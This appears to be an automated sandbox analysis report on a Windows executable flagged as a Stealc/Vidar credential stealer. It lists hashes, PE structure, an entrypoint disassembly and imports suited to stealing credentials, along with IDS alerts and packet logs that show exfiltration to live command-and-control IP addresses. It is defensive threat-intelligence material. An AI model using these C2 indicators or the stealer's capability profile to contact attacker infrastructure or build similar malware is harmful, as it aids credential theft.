                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                            Chrome Cache Entry: 71

                                                                                            Download File
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:ASCII text, with very long lines (859)
                                                                                            Category:downloaded
                                                                                            Size (bytes):864
                                                                                            Entropy (8bit):5.161482335082147
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:iawBL2WXqYBHslgT1d1uawBATguoBN2t2t2t2t2t2t2tomffffffo:E2oKlgJXwBAcuSNYYYYYYYomffffffo
                                                                                            MD5:FD745B8085BD9371573EEC460FA7240F
                                                                                            SHA1:B6B92C836004FF798F1F57B602AE3E54F4180829
                                                                                            SHA-256:059647799F1B2203D868D8ADB8CCB1342775C81032ECD00DED7E40A3F17E799C
                                                                                            SHA-512:31FAFDE6532FFC19BD7F30E83F1C528D71960889047EF37B2FC8AA68782FF3958C8157ECA5C0B2A044D90BD2281FA79490E0E95AF10434EE59EA4192C73636A0
                                                                                            Malicious:false
                                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                                            Preview:)]}'.["",["rainbow six siege x","playboi carti album release date","blood moon total lunar eclipse","new york giants stone forsythe","billy flynn","google chromecast audio","nfl mock draft 2025 steelers","lip bu tan intel ceo"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":"-1958330207576806742","google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):6.376967528982249
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:ngbtiladkrthgad.exe
                                                                                            File size:140'800 bytes
                                                                                            MD5:20beeeadd1cfac0bb5bda17172f1359f
                                                                                            SHA1:fa2ca39b5e4f273d6017cb731086ce0e81af221c
                                                                                            SHA256:c008a013fe6de93e4e83f0ce98098130fc16cecbf15c5e15438a8ccc47ceec69
                                                                                            SHA512:ff7fd974aca4998029f87a0258125657ce28c92bf6fe556117fb4e7d8df93d316ccf18e9c9074c6a1b7a5b2b19b2cebabdf041f35096e47c93f3e67baf9ae222
                                                                                            SSDEEP:3072:aVvH8RuVrLyEj/S2CUGACcceJd/klDHa/R8mxu3s8Q9yu:KH8RuRLlzgUd6a/Asl9yu
                                                                                            TLSH:35D37C117282A0B1E8472B741E7F77BDEEB04E256B908ACBD3C47D598F191E52371C19
                                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.....................`.......r............@.........................................................................h...@..

                                                                                            File Icon

                                                                                            Icon Hash:90cececece8e8eb0

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x417210
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x67BBFA01 [Mon Feb 24 04:48:01 2025 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:6
                                                                                            OS Version Minor:0
                                                                                            File Version Major:6
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:6
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:351fbae162a7dacb0ecda3be35f09973

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            push ebx
                                                                                            push edi
                                                                                            push esi
                                                                                            and esp, FFFFFFF8h
                                                                                            sub esp, 000007A0h
                                                                                            mov byte ptr [esp+0Ah], FFFFFFA0h
                                                                                            mov dword ptr [esp+0000008Ch], 00000082h
                                                                                            mov word ptr [esp+0Eh], 3159h
                                                                                            mov word ptr [esp+1Ah], F6BDh
                                                                                            mov dword ptr [esp+50h], 00000021h
                                                                                            mov byte ptr [esp+09h], 00000067h
                                                                                            mov word ptr [esp+0Ch], 003Fh
                                                                                            mov dword ptr [esp+20h], 00007CBFh
                                                                                            mov byte ptr [esp+08h], FFFFFFBFh
                                                                                            mov dword ptr [esp+00000088h], 0000349Eh
                                                                                            mov byte ptr [esp+0Bh], 0000003Dh
                                                                                            mov byte ptr [esp+1Dh], 0000006Dh
                                                                                            mov dword ptr [esp+00000084h], 0027D1EFh
                                                                                            mov word ptr [esp+32h], C02Eh
                                                                                            mov dword ptr [esp+14h], 00000000h
                                                                                            mov dword ptr [esp+10h], 00009CC3h
                                                                                            movzx eax, word ptr [esp+0Ch]
                                                                                            mov dword ptr [esp+3Ch], 00000000h
                                                                                            mov dword ptr [esp+38h], 00000041h
                                                                                            mov eax, dword ptr [esp+10h]
                                                                                            mov eax, dword ptr [esp+14h]
                                                                                            movzx eax, byte ptr [esp+0Bh]
                                                                                            movzx eax, word ptr [esp+1Ah]
                                                                                            movzx eax, ax
                                                                                            mov dword ptr [esp+48h], eax
                                                                                            movzx eax, word ptr [esp+0Eh]
                                                                                            mov word ptr [esp+30h], 6F05h
                                                                                            movzx eax, word ptr [esp+0Ch]
                                                                                            mov byte ptr [esp+1Ch], al

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1fe680x140.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x270000x1a8.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x280000xfd0.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1ec880xc0.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x202780x2d0.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x1c0be0x1c200defcbd96cb4c6c83068e7f7c390edf24False0.5079340277777777data6.44296595590421IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x1e0000x31c00x32008a8c7cffc110e91f82018c3866bd91d3False0.4875data5.670548124480909IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0x220000x20600x1800baabd42a89f62409dfd75381df860de0False0.05224609375data1.4692578550426418IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .00cfg0x250000x80x200e2cfc4a44f9b2582a627904a2e9bab5eFalse0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .CRT0x260000x40x2004a38deb9a7535c4f23e9fd10dddc3678False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .rsrc0x270000x1a80x2007f6ac8de4c533dd84f236915ba981e52False0.482421875data4.183569951400347IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x280000xfd00x1000513026ad18e96e0f11be050d9e9a9391False0.842529296875data6.701664548847092IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_MANIFEST0x270600x143XML 1.0 document, ASCII textEnglishUnited States0.628482972136223

                                                                                            Imports

                                                                                            DLLImport
                                                                                            msvcrt.dll??2@YAPAXI@Z, ??3@YAXPAX@Z, ??_U@YAPAXI@Z, ??_V@YAXPAX@Z, _splitpath, atexit, free, isupper, malloc, memchr, memcmp, memcpy, memmove, memset, rand, srand, strchr, strcpy, strcpy_s, strlen, strncpy, strstr, strtok_s
                                                                                            KERNEL32.dllCloseHandle, CopyFileA, CreateDirectoryA, CreateEventA, CreateFileA, CreateProcessA, CreateThread, CreateToolhelp32Snapshot, DeleteFileA, ExitProcess, ExpandEnvironmentStringsA, FileTimeToSystemTime, FindClose, FindFirstFileA, FindNextFileA, GetComputerNameA, GetComputerNameW, GetCurrentProcessId, GetDriveTypeA, GetEnvironmentVariableA, GetFileAttributesA, GetFileInformationByHandle, GetFileSize, GetFileSizeEx, GetFileType, GetFullPathNameA, GetLastError, GetLocalTime, GetLocaleInfoA, GetLogicalDriveStringsA, GetLogicalProcessorInformationEx, GetModuleFileNameA, GetProcAddress, GetProcessHeap, GetSystemInfo, GetSystemTime, GetTempPathW, GetTickCount, GetTimeZoneInformation, GetVolumeInformationA, GetWindowsDirectoryA, GetWindowsDirectoryW, GlobalAlloc, GlobalFree, GlobalLock, GlobalMemoryStatusEx, GlobalSize, HeapAlloc, HeapFree, K32GetModuleFileNameExA, LoadLibraryW, LocalAlloc, LocalFree, OpenEventA, OpenProcess, Process32First, Process32Next, RaiseException, ReadFile, ReadProcessMemory, SetFilePointer, Sleep, SystemTimeToFileTime, TerminateProcess, VirtualQueryEx, WaitForSingleObject, WriteFile, lstrcatA, lstrcpyA, lstrlenA, lstrlenW
                                                                                            ADVAPI32.dllGetCurrentHwProfileA, GetUserNameA, GetUserNameW, RegCloseKey, RegEnumKeyExA, RegGetValueA, RegOpenKeyExA, RegQueryValueExA
                                                                                            api-ms-win-crt-runtime-l1-1-0.dll_invalid_parameter_noinfo_noreturn
                                                                                            USER32.dllCharToOemA, CloseDesktop, CloseWindow, CreateDesktopA, EnumDisplayDevicesA, GetDC, GetDesktopWindow, GetKeyboardLayoutList, GetWindowRect, OpenDesktopA, ReleaseDC, wsprintfA, wsprintfW
                                                                                            api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsnprintf_s, __stdio_common_vsprintf
                                                                                            GDI32.dllBitBlt, CreateCompatibleBitmap, CreateCompatibleDC, CreateDCA, DeleteObject, GetDeviceCaps, SelectObject
                                                                                            SHELL32.dllSHFileOperationA, SHGetFolderPathA, ShellExecuteExA, ShellExecuteExW
                                                                                            ole32.dllCreateStreamOnHGlobal, GetHGlobalFromStream
                                                                                            WS2_32.dllWSACleanup, WSAStartup, closesocket, connect, freeaddrinfo, getaddrinfo, htons, recv, send, socket
                                                                                            SHLWAPI.dllPathFileExistsA, PathMatchSpecA, StrStrA
                                                                                            CRYPT32.dllCryptBinaryToStringA, CryptUnprotectData
                                                                                            WININET.dllHttpOpenRequestA, HttpQueryInfoA, HttpSendRequestA, InternetCloseHandle, InternetConnectA, InternetCrackUrlA, InternetOpenA, InternetOpenUrlA, InternetReadFile, InternetSetOptionA
                                                                                            bcrypt.dllBCryptCloseAlgorithmProvider, BCryptDecrypt, BCryptDestroyKey, BCryptGenerateSymmetricKey, BCryptOpenAlgorithmProvider, BCryptSetProperty
                                                                                            dbghelp.dllSymMatchString

                                                                                            Possible Origin

                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States

                                                                                            Network Behavior

                                                                                            Suricata IDS Alerts

                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2025-03-13T14:49:52.411851+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.44972378.47.63.132443TCP
                                                                                            2025-03-13T14:49:57.325793+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.44972878.47.63.132443TCP
                                                                                            2025-03-13T14:49:57.326064+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config178.47.63.132443192.168.2.449728TCP
                                                                                            2025-03-13T14:49:59.682778+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1178.47.63.132443192.168.2.449729TCP
                                                                                            2025-03-13T14:50:02.032048+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44973278.47.63.132443TCP
                                                                                            2025-03-13T14:50:03.389862+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44973378.47.63.132443TCP
                                                                                            2025-03-13T14:50:03.824037+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44973478.47.63.132443TCP
                                                                                            2025-03-13T14:50:03.824037+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.44973478.47.63.132443TCP
                                                                                            2025-03-13T14:50:05.735487+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44973578.47.63.132443TCP
                                                                                            2025-03-13T14:50:05.735487+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.44973578.47.63.132443TCP
                                                                                            2025-03-13T14:50:07.701305+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44973678.47.63.132443TCP
                                                                                            2025-03-13T14:50:07.701305+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.44973678.47.63.132443TCP
                                                                                            2025-03-13T14:50:16.979454+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44976078.47.63.132443TCP
                                                                                            2025-03-13T14:50:18.109277+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44976378.47.63.132443TCP
                                                                                            2025-03-13T14:50:19.051913+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44976478.47.63.132443TCP
                                                                                            2025-03-13T14:50:19.051913+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.44976478.47.63.132443TCP
                                                                                            2025-03-13T14:50:20.128435+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44976578.47.63.132443TCP
                                                                                            2025-03-13T14:50:20.128435+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.44976578.47.63.132443TCP
                                                                                            2025-03-13T14:50:22.104272+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44976678.47.63.132443TCP
                                                                                            2025-03-13T14:50:22.104272+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.44976678.47.63.132443TCP
                                                                                            2025-03-13T14:50:23.257529+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44976778.47.63.132443TCP
                                                                                            2025-03-13T14:50:23.257529+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.44976778.47.63.132443TCP
                                                                                            2025-03-13T14:50:25.902180+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44976878.47.63.132443TCP
                                                                                            2025-03-13T14:50:25.902180+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.44976878.47.63.132443TCP
                                                                                            2025-03-13T14:50:28.375443+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44976978.47.63.132443TCP
                                                                                            2025-03-13T14:50:28.375443+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.44976978.47.63.132443TCP
                                                                                            2025-03-13T14:50:40.633735+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44977278.47.63.132443TCP
                                                                                            2025-03-13T14:50:43.223167+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44977478.47.63.132443TCP

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Mar 13, 2025 14:49:44.762608051 CET49719443192.168.2.4149.154.167.99
                                                                                            Mar 13, 2025 14:49:44.762665033 CET44349719149.154.167.99192.168.2.4
                                                                                            Mar 13, 2025 14:49:44.762779951 CET49719443192.168.2.4149.154.167.99
                                                                                            Mar 13, 2025 14:49:44.774780989 CET49719443192.168.2.4149.154.167.99
                                                                                            Mar 13, 2025 14:49:44.774797916 CET44349719149.154.167.99192.168.2.4
                                                                                            Mar 13, 2025 14:49:45.194778919 CET49671443192.168.2.4204.79.197.203
                                                                                            Mar 13, 2025 14:49:45.506809950 CET49671443192.168.2.4204.79.197.203
                                                                                            Mar 13, 2025 14:49:46.105993986 CET44349719149.154.167.99192.168.2.4
                                                                                            Mar 13, 2025 14:49:46.106074095 CET49719443192.168.2.4149.154.167.99
                                                                                            Mar 13, 2025 14:49:46.116147995 CET49671443192.168.2.4204.79.197.203
                                                                                            Mar 13, 2025 14:49:46.159914017 CET49719443192.168.2.4149.154.167.99
                                                                                            Mar 13, 2025 14:49:46.159953117 CET44349719149.154.167.99192.168.2.4
                                                                                            Mar 13, 2025 14:49:46.160377026 CET44349719149.154.167.99192.168.2.4
                                                                                            Mar 13, 2025 14:49:46.160474062 CET49719443192.168.2.4149.154.167.99
                                                                                            Mar 13, 2025 14:49:46.163888931 CET49719443192.168.2.4149.154.167.99
                                                                                            Mar 13, 2025 14:49:46.208336115 CET44349719149.154.167.99192.168.2.4
                                                                                            Mar 13, 2025 14:49:46.830766916 CET44349719149.154.167.99192.168.2.4
                                                                                            Mar 13, 2025 14:49:46.830796957 CET44349719149.154.167.99192.168.2.4
                                                                                            Mar 13, 2025 14:49:46.830848932 CET44349719149.154.167.99192.168.2.4
                                                                                            Mar 13, 2025 14:49:46.830883980 CET44349719149.154.167.99192.168.2.4
                                                                                            Mar 13, 2025 14:49:46.830897093 CET49719443192.168.2.4149.154.167.99
                                                                                            Mar 13, 2025 14:49:46.830923080 CET49719443192.168.2.4149.154.167.99
                                                                                            Mar 13, 2025 14:49:46.830960989 CET49719443192.168.2.4149.154.167.99
                                                                                            Mar 13, 2025 14:49:46.927862883 CET49719443192.168.2.4149.154.167.99
                                                                                            Mar 13, 2025 14:49:46.927894115 CET44349719149.154.167.99192.168.2.4
                                                                                            Mar 13, 2025 14:49:47.187017918 CET49720443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:47.187103987 CET4434972078.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:47.187247038 CET49720443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:47.189944029 CET49720443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:47.189960957 CET4434972078.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:47.319294930 CET49671443192.168.2.4204.79.197.203
                                                                                            Mar 13, 2025 14:49:49.219716072 CET4434972078.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:49.219865084 CET49720443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:49.225070953 CET49720443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:49.225097895 CET4434972078.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:49.225424051 CET4434972078.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:49.225527048 CET49720443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:49.226130009 CET49720443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:49.268337011 CET4434972078.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:49.725594997 CET49671443192.168.2.4204.79.197.203
                                                                                            Mar 13, 2025 14:49:49.965409994 CET4434972078.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:49.965481043 CET49720443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:49.965500116 CET4434972078.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:49.965542078 CET49720443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:49.968297005 CET49720443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:49.968378067 CET4434972078.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:49.968436956 CET49720443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:49.979149103 CET49723443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:49.979192972 CET4434972378.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:49.979274988 CET49723443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:49.979485035 CET49723443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:49.979497910 CET4434972378.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:51.400465012 CET4434972378.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:51.400564909 CET49723443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:51.404035091 CET49723443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:51.404050112 CET4434972378.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:51.404298067 CET4434972378.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:51.404371977 CET49723443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:51.404758930 CET49723443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:51.452332020 CET4434972378.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:52.411859989 CET4434972378.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:52.411978006 CET49723443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:52.412017107 CET4434972378.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:52.412070036 CET49723443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:52.412159920 CET49723443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:52.412206888 CET4434972378.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:52.412260056 CET49723443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:52.429195881 CET49725443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:52.429251909 CET4434972578.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:52.429331064 CET49725443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:52.429537058 CET49725443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:52.429553032 CET4434972578.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:53.834441900 CET4434972578.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:53.834523916 CET49725443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:53.839996099 CET49725443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:53.840008974 CET4434972578.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:53.840328932 CET4434972578.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:53.840387106 CET49725443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:53.840797901 CET49725443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:53.884326935 CET4434972578.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:53.960406065 CET49678443192.168.2.420.189.173.27
                                                                                            Mar 13, 2025 14:49:54.272407055 CET49678443192.168.2.420.189.173.27
                                                                                            Mar 13, 2025 14:49:54.538059950 CET49671443192.168.2.4204.79.197.203
                                                                                            Mar 13, 2025 14:49:54.881792068 CET49678443192.168.2.420.189.173.27
                                                                                            Mar 13, 2025 14:49:54.888566017 CET4434972578.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:54.888595104 CET4434972578.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:54.888627052 CET49725443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:54.888653994 CET4434972578.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:54.888669968 CET4434972578.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:54.888673067 CET49725443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:54.888721943 CET49725443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:54.888721943 CET49725443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:54.894804955 CET49725443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:54.894819975 CET4434972578.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:54.958952904 CET49728443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:54.958993912 CET4434972878.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:54.962393999 CET49728443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:54.962593079 CET49728443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:54.962603092 CET4434972878.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:56.084959984 CET49678443192.168.2.420.189.173.27
                                                                                            Mar 13, 2025 14:49:56.320807934 CET4434972878.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:56.320884943 CET49728443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:56.321595907 CET49728443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:56.321614027 CET4434972878.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:56.323579073 CET49728443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:56.323594093 CET4434972878.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:57.325818062 CET4434972878.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:57.325846910 CET4434972878.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:57.325905085 CET49728443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:57.325934887 CET4434972878.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:57.325948954 CET49728443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:57.325949907 CET4434972878.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:49:57.325973034 CET49728443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:57.326004028 CET49728443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:57.326308966 CET49728443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:49:57.326325893 CET4434972878.47.63.132192.168.2.4
